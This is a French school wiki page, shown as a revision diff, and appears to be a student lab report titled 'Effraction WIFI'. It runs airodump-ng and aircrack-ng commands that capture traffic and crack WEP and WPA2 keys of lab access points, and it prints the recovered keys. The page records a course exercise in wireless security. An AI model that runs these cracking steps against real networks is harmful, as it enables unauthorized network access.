« Atelier SysRes SE4 2025/2026 E6 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
(Page créée avec « === Effraction WIFI === <syntaxhighlight lang="bash"> sudo airodump-ng wlan1 </syntaxhighlight>On trouve cracotte06 avec son adresse et son chanel<syntaxhighlight lang="bash"> sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4 </syntaxhighlight>Le fichier dump étant crée, on récupère la clé avec la commande suivante :<syntaxhighlight lang="bash"> sudo aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap </syntaxhighlight><syntaxhighlight lang="bash"... »)
 
Aucun résumé des modifications
 
Ligne 22 : Ligne 22 :
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ]  
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ]  
Decrypted correctly: 100%
Decrypted correctly: 100%
</syntaxhighlight><syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13
</syntaxhighlight><syntaxhighlight lang="bash">
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap
</syntaxhighlight><syntaxhighlight lang="bash">
                              Aircrack-ng 1.7
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s)
      Time left: 13 minutes, 48 seconds                        66.97%
                          KEY FOUND! [ 66684666 ]
      Master Key    : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD
                      4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      EAPOL HMAC    : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00


</syntaxhighlight>
</syntaxhighlight>

Version actuelle datée du 10 février 2026 à 16:16

Effraction WIFI

sudo airodump-ng wlan1

On trouve cracotte06 avec son adresse et son chanel

sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4

Le fichier dump étant crée, on récupère la clé avec la commande suivante :

sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap
                                                                                     Aircrack-ng 1.7 


                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)

   KB    depth   byte(vote)
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) 
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) 
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) 
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) 
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) 

             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] 
	Decrypted correctly: 100%
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap
                               Aircrack-ng 1.7 

      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) 

      Time left: 13 minutes, 48 seconds                         66.97%

                           KEY FOUND! [ 66684666 ]


      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD 
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00